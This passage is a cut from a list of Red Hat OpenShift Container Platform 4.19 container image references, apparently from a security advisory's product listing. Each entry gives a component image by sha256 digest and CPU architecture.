"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
